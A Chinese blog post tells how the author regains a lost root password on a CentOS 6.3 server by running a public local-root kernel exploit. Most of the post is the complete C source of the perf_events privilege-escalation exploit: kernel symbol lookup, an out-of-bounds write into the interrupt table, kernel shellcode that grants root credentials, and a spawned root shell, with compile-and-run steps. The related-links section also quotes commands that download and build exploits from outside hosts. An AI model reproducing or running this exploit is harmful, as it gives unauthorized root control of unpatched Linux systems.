linux内核溢出利用,利用Linux内核本地漏洞解决root密码忘记

最新推荐文章于 2022-08-25 21:21:50 发布
最新推荐文章于 2022-08-25 21:21:50 发布
阅读量169 收藏
点赞数
文章标签: linux内核溢出利用

回家期间,同事说有台服务器的root密码不对了,无法通过su - root切换到root,问我如何解决。

服务器环境:CentOS 6.3 x86_64 定制版

默认登录:服务器添加了普通用户master用于remote ssh login,默认root是禁止直接remote ssh login的,只能通过master登录后,通过su来切换

编译环境:gcc 4.4.6

在网上查看了下Linux的本地溢出漏洞,恰好找到一个“Linux kernel perf_events local root exploit”

之后将这个漏洞的溢出代码进行了编译,执行后,顺利获得了root权限,使用passwd root重置了密码,解决了此次的小故障

附上,溢出代码

vi perf_exp.c 将代码插入,然后执行gcc -o perf_exp perf_exp.c -O2就会生成溢出程序perf_exp,执行后即可得到root的shell

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define KALLSYMS_NAME "/boot/System.map-2.6.32-279.el6.x86_64"

#define BASE 0x380000000

#define SIZE 0x010000000

#define KSIZE 0x2000000

#define USER_CS 0x33

#define USER_SS 0x2b

#define USER_FL 0x246

#define STACK(x) (x + sizeof(x))

typedef int __attribute__((regparm(1)))(*_commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(1)))(*_prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

void exit_user_code(void);

char user_stack[1024 * 1024];

uint64_t *orig_idt_handler;

unsigned char kern_sc[] = "\x48\xc7\xc3\x40\x08\x40\x00\xff\xe3";

struct idtr {

uint16_t limit;

uint64_t addr;

}__attribute__((packed));

void exit_user_code(void)

{

if (getuid() != 0) {

printf("[-] exploit failed.\n");

exit(-1);

}

printf("[+] Got root shell!\n");

execl("/bin/bash", "sh", "-i", NULL);

}

void kernel_shellcode(void)

{

asm volatile("swapgs\n\t"

"movq orig_idt_handler, %rsi\n\t"

"movq $-1, (%rsi)\n\t"

"movq $0, %rdi\n\t"

"movq $prepare_kernel_cred, %rsi\n\t"

"movq (%rsi), %rsi\n\t"

"callq *%rsi\n\t"

"movq %rax, %rdi\n\t"

"movq $commit_creds, %rsi\n\t"

"movq (%rsi), %rsi\n\t"

"callq *%rsi\n\t"

"movq $0x2b, 0x20(%rsp)\n\t"

"movq $user_stack, %rbx\n\t"

"addq $0x100000, %rbx\n\t"

"movq %rbx, 0x18(%rsp)\n\t"

"movq $0x246, 0x10(%rsp)\n\t"

"movq $0x33, 0x08(%rsp)\n\t"

"movq $exit_user_code, %rbx\n\t"

"movq %rbx, 0x00(%rsp)\n\t"

"swapgs\n\t"

"iretq");

}

int perf_event_open(uint32_t offset)

{

struct perf_event_attr p_attr;

int fd;

memset(&p_attr, 0, sizeof(struct perf_event_attr));

p_attr.type = PERF_TYPE_SOFTWARE;

p_attr.size = sizeof(struct perf_event_attr);

p_attr.config = offset;

p_attr.mmap = 1;

p_attr.freq = 1;

fd = syscall(__NR_perf_event_open, &p_attr, 0, -1, -1, 0);

if (fd == -1) {

perror("perf_event_open");

return -1;

}

if (close(fd) == -1) {

perror("close");

return -1;

}

return 0;

}

unsigned long find_symbol_by_proc(char *file_name, char *symbol_name)

{

FILE *s_fp;

char buff[200];

char *p = NULL, *p1 = NULL;

unsigned long addr = 0;

s_fp = fopen(file_name, "r");

if (s_fp == NULL) {

printf("open %s failed.\n", file_name);

return 0;

}

while (fgets(buff, 200, s_fp) != NULL) {

if (strstr(buff, symbol_name) != NULL) {

buff[strlen(buff) - 1] = '\0';

p = strchr(strchr(buff, ' ') + 1, ' ');

++p;

if (!p)

return 0;

if (!strcmp(p, symbol_name)) {

p1 = strchr(buff, ' ');

*p1 = '\0';

sscanf(buff, "%lx", &addr);

break;

}

}

}

fclose(s_fp);

return addr;

}

int perf_symbol_init(void)

{

struct utsname os_ver;

char system_map[128];

if (uname(&os_ver) == -1) {

perror("uname");

return -1;

}

printf("[+] target kernel: %s\tarch: %s\n", os_ver.release, os_ver.machine);

snprintf(system_map, sizeof(system_map),

"/boot/System.map-%s", os_ver.release);

printf("[+] looking for symbols...\n");

commit_creds = (_commit_creds)find_symbol_by_proc(system_map, "commit_creds");

if (!commit_creds) {

printf("[-] not found commit_creds addr.\n");

return -1;

}

printf("[+] found commit_creds addr: %p\n", commit_creds);

prepare_kernel_cred =(_prepare_kernel_cred)find_symbol_by_proc(system_map,

"prepare_kernel_cred");

if (!prepare_kernel_cred) {

printf("[-] not found prepare_kernel_cred addr.\n");

return -1;

}

printf("[+] found prepare_kernel_cred addr: %p\n", prepare_kernel_cred);

}

void exploit_banner(void)

{

printf("Linux kernel perf_events(2.6.37 - 3.x) local root exploit.\n"

"by wzt 2013\thttps://www.cloud-sec.org\n\n");

}

int main()

{

struct idtr idt;

uint64_t kbase;

uint8_t *code;

uint32_t *map;

int i;

int idt_offset;

exploit_banner();

if (perf_symbol_init() == -1)

return -1;

map = mmap((void*)BASE, SIZE, PROT_READ | PROT_WRITE,

MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);

if (map != (void *)BASE) {

perror("mmap");

return -1;

}

printf("[+] mmap at %p ok.\n", (void *)map);

memset(map, 0, SIZE);

if (perf_event_open(-1) == -1)

return -1;

if (perf_event_open(-2) == -1)

return -1;

for (i = 0; i < SIZE/4; i++) {

if (map[i]) {

assert(map[i+1]);

break;

}

}

assert(i

asm ("sidt %0" : "=m"(idt));

kbase = idt.addr & 0xff000000;

code = mmap((void*)kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);

if (code != (void *)kbase) {

perror("mmap");

return -1;

}

printf("[+] mmap shellcode at %p ok.\n", (void *)code);

memset(code, 0x90, KSIZE);

code += KSIZE - 1024;

*(uint32_t *)(kern_sc + 3) = (uint32_t)&kernel_shellcode;

memcpy(code - 9, kern_sc, 9);

orig_idt_handler = (uint64_t *)(idt.addr + 0x48);

printf("[+] int4 idt handler addr: %lx\n", orig_idt_handler);

idt_offset = -i + (((idt.addr & 0xffffffff) - 0x80000000) / 4) + 16;

printf("[+] trigger offset: %d\n", idt_offset);

if (perf_event_open(idt_offset) == -1)

return -1;

printf("[+] trigger int4 ...\n");

asm("int $0x4");

}

巍言耸听
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux x64 shellcode,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 512
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
Linux因15年前的内核漏洞被获得 Root 权限
llawliet0001的专栏
03-28 160
导读 近日,在Linux内核的 iSCSI 子系统中发现的三个漏洞可能会允许具有基本用户权限的本地攻击者在未打补丁的 Linux 系统上获得 root 权限。 这些安全漏洞只能在本地被利用,这意味着潜在的攻击者将不得不通过利用另一个漏洞或使用其他攻击载体来访问受影响的设备。 15年之久的 Linux 内核漏洞 这些漏洞在 2006年 iSCSI 内核子系统的初始开发阶段就被引入,如今时隔 15 年,GRIMM 的研究人员终于发现了这些漏洞。 根据 GRIMM 安全研究员 Adam N..
Linux root 密码 70秒,Linux神奇漏洞:长按回车键70秒 即可轻松拿到Root权限
weixin_32123259的博客
05-07 213
一般来说获取系统Root权限是很困难的,尤其是加密系统中,但西班牙安全研究员Hector Marco、Ismael Ripoll发现,Linux系统下只需按住回车键70秒钟,就能轻松绕过系统认证,拿到Root权限,进而远程控制经过加密的Linux系统。这个问题来自Linux标准磁盘加密程序Cryptsetup的一个漏洞(CVE-2016-4484),它处理密码输入错误的时候,会允许用户多次重试输入...
linux权限溢出,linux本地自动溢出获取root权限工具
weixin_32563411的博客
05-01 112
脚本内容如下:#!/usr/bin/perl# linux本地自动溢出获取root权限工具# chmod 777 getroot.pl# ./getroot.pl{system("wget -O 15704 http://www.exploit-db.com/download/15704");system("gcc -w 15704.c -o 15704");system("chmod 777 1...
linux本地自动溢出获取root权限工具
瞎几把学
11-26 1230
清理了一些连接因为不能访问,或者清除了我的连接的。。。。。留言的连接我已经做好了! 下面应该是是某个国外黑客溢出用的 http://safilooptics.ge/tmp/aa.txt   [python] view plaincopyprint? {  system("wget http://standproje.com/modules/mod_footer/
内核溢出利用技术
03-10
内核溢出利用技术是计算机安全领域中的一个重要话题,它涉及到操作系统内核漏洞利用和攻击方式。在本文中,我们将深入探讨内核溢出的基本原理、产生原因、危害以及如何进行防护。 内核溢出是指当程序在操作系统...
Linux内核漏洞浅析
03-04
Linux内核漏洞浅析 Linux操作系统因其开源、稳定、安全的特性,在全球范围内获得了广泛的应用。从个人电脑到服务器,再到嵌入式设备,Linux的身影无处不在。然而,随着其普及度的提高,安全问题也随之浮出水面。...
linux提权工具利用2.6内核漏洞
12-27
Linux系统中,提权(Privilege Escalation)是指非特权用户通过发现并利用系统中的漏洞或不安全配置,提升其权限至管理员或root级别的过程。标题提及的"linux提权工具利用2.6内核漏洞",指的是利用特定版本的Linux...
《网络渗透技术》-内核溢出利用技术
06-08
《网络渗透技术》-内核溢出利用技术是网络安全领域中的高级话题,主要涉及操作系统内核的安全漏洞利用。网络渗透,又称黑客攻击,是指通过利用系统漏洞,非法或非授权地进入目标系统的活动。内核溢出利用技术是其中...
Linux环境下常见漏洞利用技术.zip
05-20
7. **权限提升(Privilege Escalation)**:攻击者利用低权限账户发现的漏洞来获取更高权限,例如通过提权漏洞从普通用户变为root用户。 8. **SELinux和AppArmor**:这两个安全模块提供了强制访问控制,可限制进程...
Linux kernel perf_events local root exploit
weixin_30332705的博客
05-25 102
测试方法: 提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* * Linux kernel perf_events local root exploit * * by wzt 2013 http://www.cloud-sec.org * * gcc -o perf_exp per_exp.c -O2 * * target: 2.6.37 -...
linux内核溢出研究系列,linux内核溢出研究系列(1)--通用shellcode篇
weixin_35726635的博客
05-02 150
三、shellcode扩展从前面的shellcode分析我们可以知道此shellcode有多个值是不定值,和系统是相关的,第一个是内核栈的大小,不同的系统下面,内核栈的大小不一定相同,就会影响到$0xffffe000这个值,一般系统内核栈大小是8k,就使用$0xffffe000,有些系统下面,内核栈大小是4kb,就是要使用0xfffff000。第二个不定值是用户DS和用户CS的值,不同的内核版本下...
关于内核溢出漏洞的分析
kali_Ma的博客
12-31 2068
一、漏洞背景 CVE-2021-22555是一个存在了15年之久的内核溢出漏洞,它位于内核的Netfilter组件中,这个组件可以被用来实现防火墙、NAT等功能。 该漏洞在2006年由commit 9fa492cdc160cd27ce1046cb36f47d3b2b1efa21引入,并在2021年由commit b29c457a6511435960115c0f548c4360d5f4801d修复。 利用这个漏洞可以导致目标系统拒绝服务,甚至实现提权、容器逃逸并执行任意代码,危害等级极高
惊爆!!!一条命令,瞬间让普通用户提权为root,赶紧修复!
最新发布
笨办法学linux的博客
08-25 1477
漏洞非常容易利用,允许任何未经授权的用户通过在其默认配置中利用漏洞,来获得易受攻击主机上的完全root权限。
linux使普通用户获得root权限的vmsplice系统调用漏洞分析
Endoresu的专栏
11-14 1206
转自:http://www.nhs8.com/tech/2276.html vmsplice系统调用是linux内核2.6.17第一次引入的,随 后被发现存在能让普通用户提升到root权限的漏洞。该漏洞影响 的版本网络上笼统的说法是:2.6.17-2.6.24.1,实际上更确切的说是:2.6.17- 2.6.22.17,2.6.23-2.6.23.15 和 2.6.24-2.6.24.1.
Linux内核提权漏洞发现与利用
Zlirving_的博客
07-14 857
漏洞发现 针对相应系统版本的cve提权漏洞 uname -a 所有版本 uname -r 内核版本信息 cat /proc/version 内核信息 Linux Exploit Suggester 下载linux-exploit-suggester.sh文件 wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh 若出现无法连上服务器时 (这个当然要在root
Linux权限提升—Kernel exploit
qq_27828281的博客
12-21 810
Linux权限提升—利用kernel exploit进行权限提升。
linux内核环境使用方法,【系列分享】Linux 内核漏洞利用教程(一):环境配置...
weixin_39603357的博客
04-29 376
预估稿费:300RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿传送门0x00: 前言一直想入门linux kernel exploit,但是网络上比较成熟的资料很少,只能找到一些slide和零碎的文档,对于入门选手来说真的很困难。还好在自己瞎摸索的过程中上了joker师傅的装甲车,师傅说:要有开源精神,要给大家学习的机会。所以就有了这个系列的文章,第一篇记录是环境配置篇...
防范权限提升-Linux提权手法超级攻略
08-17
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。" 在Linux系统中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值